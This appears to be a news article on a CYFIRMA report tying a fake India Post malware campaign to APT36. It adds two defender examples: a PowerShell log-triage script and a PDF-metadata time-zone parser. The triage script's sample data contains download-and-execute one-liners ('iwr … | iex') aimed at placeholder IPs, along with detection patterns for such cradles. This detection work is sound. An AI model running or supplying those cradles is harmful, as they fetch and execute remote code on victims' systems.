
A new cybersecurity report by CYFIRMA has uncovered a sophisticated cyberattack campaign targeting Indian users, allegedly orchestrated by a Pakistan-based advanced persistent threat (APT) group. The report details how the threat actors created a fraudulent website impersonating the Indian Post Office to distribute malware to both Windows and Android users.
The attackers employed a multi-pronged strategy to compromise their targets. According to CYFIRMA, the fraudulent website served different malicious payloads depending on the user’s device.
- For PC users, the site offered a PDF document containing “ClickFix” instructions. These instructions tricked users into executing a PowerShell command, potentially leading to system compromise.
- Mobile users were prompted to download an Android application named “indiapost[.]apk.” This malicious app requested extensive permissions and exfiltrated user data.
The Android app also promoted a “VivaGame” app which, while initially functional, eventually prompted users to add bank card details to load money into a wallet in order to keep playing.
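The ClickFix lure described above relies on the victim pasting a PowerShell one-liner into a console or the Run dialog, so the command itself lands in PowerShell Script Block Logging (Event ID 4104) on hosts where that logging is enabled. The following is an added example, not code from CYFIRMA or from the report, showing how a defender can triage such script-block text: it scores each line against a small set of indicators that are individually benign but rarely appear together in administrative use, and it decodes `-EncodedCommand` payloads so the indicators are applied to the decoded text as well. The sample lines are constructed for the example and use documentation IP ranges; the indicator names and the threshold of two hits are this example's own choices.

```python
import base64
import re

# Constructed sample lines in the style of PowerShell Script Block Logging (Event ID 4104)
# message text. They are illustrative, not text from the CYFIRMA report; the IP addresses
# come from documentation ranges.
SAMPLE_SCRIPT_BLOCKS = [
    'powershell -w hidden -ep bypass -c "iwr http://203.0.113.10/x.txt | iex"',
    "Get-ChildItem C:\\Users\\alice\\Documents -Recurse | Measure-Object",
    "powershell -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand SQBFAFgAIAAoAE4A",
    "Invoke-WebRequest -Uri https://www.microsoft.com -OutFile page.html",
    "irm 198.51.100.7/p.ps1 | iex",
]

# Each indicator alone is common in legitimate administration; ClickFix-style one-liners
# tend to combine several of them in a single command.
INDICATORS = {
    "hidden_window": re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b"),
    "bypass_policy": re.compile(r"(?i)(?:^|\s)-e(?:p|xec|xecutionpolicy)\s+bypass\b"),
    "download_cradle": re.compile(
        r"(?i)\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b"
    ),
    "invoke_expression": re.compile(r"(?i)\biex\b|invoke-expression"),
    "encoded_command": re.compile(r"(?i)(?:^|\s)-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"),
    "raw_ip_url": re.compile(r"(?:https?://)?\b\d{1,3}(?:\.\d{1,3}){3}\b(?:/\S*)?"),
}

ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:nc|ncodedcommand)?\s+(?P<b64>[A-Za-z0-9+/=]{16,})")


def decode_encoded_command(line: str):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group("b64")).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def score_line(line: str) -> set:
    """Names of all indicators that fire on the line or on its decoded payload."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(line)}
    decoded = decode_encoded_command(line)
    if decoded:
        hits |= {name for name, rx in INDICATORS.items() if rx.search(decoded)}
    return hits


def triage(lines, threshold: int = 2):
    """Return (index, sorted indicator names) for lines that reach the threshold.
    A single hit (e.g. a plain Invoke-WebRequest download) is not reported, which
    keeps ordinary administrative activity out of the alert queue."""
    flagged = []
    for i, line in enumerate(lines):
        hits = score_line(line)
        if len(hits) >= threshold:
            flagged.append((i, sorted(hits)))
    return flagged


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_SCRIPT_BLOCKS):
        print(f"[{idx}] {', '.join(hits)}\n    {SAMPLE_SCRIPT_BLOCKS[idx]}")
```

Run against the constructed lines, the three one-liners that hide the window, bypass execution policy, fetch from a raw IP, or carry an encoded payload are flagged, while the directory listing and the plain download from a well-known host are not. In practice the same scoring can be applied to the `ScriptBlockText` field exported from the Microsoft-Windows-PowerShell/Operational log, and the raw-IP indicator is the one most worth tuning to the environment.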
CYFIRMA’s analysis provides compelling evidence linking the attack to a Pakistan-based APT group, assessed with medium confidence as APT36.
- The report highlights that the PDF’s metadata indicates it was created in the same time zone as Pakistan, and the author is listed as “PMYLS,” referencing Pakistan’s Prime Minister Youth Laptop Scheme.
- Further investigation into the IP address from the PowerShell command revealed a domain associated with tactics commonly used by Pakistani APT groups.
- The domain impersonating India Post was registered in November 2024, which suggests a potential Pakistan-based attacker.
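The time-zone clue in the first bullet comes from the PDF's own metadata: the document information dictionary stores `/CreationDate` and `/ModDate` as strings of the form `D:YYYYMMDDHHmmSS+HH'mm'`, and the trailing offset records the local UTC offset of the machine that produced the file. The following is an added example, not code from CYFIRMA or the report, showing how an analyst can pull those fields out of a PDF and recover the offset without a PDF library. The PDF bytes are constructed for the example; the `/Author` value mirrors the one the report cites, while the title, producer and dates are made up. It handles only unencrypted Info dictionaries with literal `(...)` strings, which covers the common case but not hex-encoded or compressed object streams.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed minimal PDF, not the file analysed in the report. /Author mirrors the value
# CYFIRMA cites; the dates, title and producer are invented for this example.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Title (Instructions) /Author (PMYLS) /Producer (Example Writer)\n"
    b"   /CreationDate (D:20241112143005+05'00') /ModDate (D:20241112150000+05'00') >>\n"
    b"endobj\ntrailer\n<< /Info 1 0 R >>\n%%EOF\n"
)

INFO_KEYS = ("Title", "Author", "Creator", "Producer", "CreationDate", "ModDate")


def extract_info(pdf_bytes: bytes) -> dict:
    """Pull literal-string entries of the Info dictionary out of raw PDF bytes.
    Only (...) literal strings are handled; backslash escapes inside them are
    kept intact so a stray ')' in a value does not truncate the match."""
    text = pdf_bytes.decode("latin-1")
    info = {}
    for key in INFO_KEYS:
        m = re.search(r"/" + key + r"\s*\(((?:\\.|[^\\)])*)\)", text)
        if m:
            info[key] = m.group(1)
    return info


# PDF date: D:YYYY then optional MM DD HH mm SS, then optional Z or +HH'mm' / -HH'mm'.
PDF_DATE = re.compile(
    r"^D:(?P<Y>\d{4})(?P<m>\d{2})?(?P<d>\d{2})?(?P<H>\d{2})?(?P<M>\d{2})?(?P<S>\d{2})?"
    r"(?:(?P<tz>[Zz+-])(?P<oh>\d{2})?'?(?P<om>\d{2})?'?)?"
)


def parse_pdf_date(value: str) -> datetime:
    """Parse a PDF date string; the result is timezone-aware only if an offset is present."""
    m = PDF_DATE.match(value)
    if not m:
        raise ValueError(f"not a PDF date: {value!r}")
    g = m.groupdict()
    parts = [int(g[k] or dflt) for k, dflt in (("Y", 0), ("m", 1), ("d", 1), ("H", 0), ("M", 0), ("S", 0))]
    tz = None
    if g["tz"] in ("Z", "z"):
        tz = timezone.utc
    elif g["tz"] in ("+", "-"):
        delta = timedelta(hours=int(g["oh"] or 0), minutes=int(g["om"] or 0))
        tz = timezone(delta if g["tz"] == "+" else -delta)
    return datetime(*parts, tzinfo=tz)


def utc_offset_label(dt: datetime):
    """Return the offset as '+HH:MM', or None when the date carried no zone."""
    off = dt.utcoffset()
    if off is None:
        return None
    total = int(off.total_seconds())
    sign = "+" if total >= 0 else "-"
    total = abs(total)
    return f"{sign}{total // 3600:02d}:{(total % 3600) // 60:02d}"


def summarize(pdf_bytes: bytes) -> dict:
    """Author plus the UTC offset of the creation and modification timestamps."""
    info = extract_info(pdf_bytes)
    out = {"author": info.get("Author")}
    for key in ("CreationDate", "ModDate"):
        out[key] = utc_offset_label(parse_pdf_date(info[key])) if key in info else None
    return out


if __name__ == "__main__":
    print(summarize(SAMPLE_PDF))
```

On the constructed file the creation and modification offsets both come back as `+05:00`, which is the offset Pakistan Standard Time uses. An offset is only a weak signal on its own, since it is shared by other regions and is trivially changed by altering the system clock, which is why the report pairs it with the author string and the infrastructure findings rather than relying on it alone.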
The CYFIRMA report identifies APT36, also known as Transparent Tribe, as the likely perpetrator. This group has a history of targeting Indian entities, including government organizations, military personnel, defense contractors, and educational institutions.
APT36’s tactics include spear-phishing emails, malicious attachments, and fake websites. The group utilizes various malware families, such as Crimson RAT, Poseidon, and ElizaRAT, and employs evasion techniques, including the use of cross-platform programming languages and abuse of popular web services for command-and-control communications.